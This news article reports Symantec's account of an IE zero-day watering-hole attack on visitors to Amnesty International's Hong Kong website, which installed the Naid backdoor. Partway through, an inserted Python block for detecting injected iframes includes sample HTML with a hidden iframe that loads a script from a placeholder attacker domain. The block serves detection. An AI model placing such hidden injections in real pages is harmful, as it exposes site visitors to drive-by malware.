Amnesty HK site visitors were slugged with IE zero day

‘Similar’ to Tencent-signed malware attack on Amnesty UK, says Symantec.

The zero day Internet Explorer (IE) attack McAfee discovered on June 1 was aimed at visitors of Amnesty International’s Hong Kong website, says Symantec.

The attackers injected an iframe into Amnesty’s Hong Kong site pointing to a Russian domain that hosted a JavaScript file. That file exploited the IE flaw, according to Symantec’s Security Response team.
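A defender-side check for the kind of injection described above: scan a page's HTML for iframes whose source is off-origin and flag the hidden ones. This is an added example, not code from the article, Symantec or Amnesty; it assumes the site's own host is known (`www.example.org` is a placeholder), and the sample HTML with its `attacker.invalid` domain is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling a watering-hole injection: one legitimate
# first-party embed, plus a zero-sized iframe pulling a script-bearing page
# from an unrelated domain (attacker.invalid is a placeholder).
SAMPLE_HTML = """
<html><body>
<h1>Campaign news</h1>
<iframe src="/video/embed?id=42" width="400" height="300"></iframe>
<iframe src="http://attacker.invalid/x.js" width="0" height="0"
        style="visibility:hidden"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag names
            self.iframes.append(dict(attrs))


def is_hidden(attrs):
    """Zero-sized or invisible frames are the classic injection pattern."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def suspicious_iframes(html, first_party_host):
    """Return (src, hidden) for each iframe whose src host is not ours.

    Relative URLs have no host and are treated as first-party."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname
        if host and host != first_party_host:
            findings.append((src, is_hidden(attrs)))
    return findings
```

Run `suspicious_iframes(SAMPLE_HTML, "www.example.org")` to list the off-origin frames; a hidden, off-origin iframe on a page that should not have one is the signal to pull the served HTML and compare it against the deployed source.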

Users exposed to the attack would have been presented with an error message stating the site was “under construction” while the exploit installed a downloader and backdoor trojan, which Symantec labels “Trojan.Naid”.

Symantec said it had seen Naid as early as January 2010, but only added a signature for it this week after McAfee researchers disclosed the vulnerability for Microsoft to patch.

Microsoft patched the flaw (CVE-2012-1875), which affected IE 6 through 9 across multiple versions of Windows, in last week's security bulletin.

Naid collects the domain names a user visits and their device’s unique identifier, and allows the attacker to issue remote commands to the PC over a proprietary protocol, said Symantec.

The exploit “seems to be very reliable” and the payload pointed to command and control servers hosted by the Chinese ISP China Shenzen Soul Tech, according to an analysis by security firm AlienVault.

Symantec said the iframe has now been removed from Amnesty’s Hong Kong site, noting the attack's similarity to the one aimed at Amnesty International’s UK website visitors last month.

In that case, the certificate for the executable file was signed by Chinese ISP Tencent. The certificate had been in use for some time and did not appear to be revoked at the time of those attacks, according to Websense.

Amnesty’s Hong Kong site was last rigged in 2010; on that occasion an IE zero day was also used to target visitors with malware.
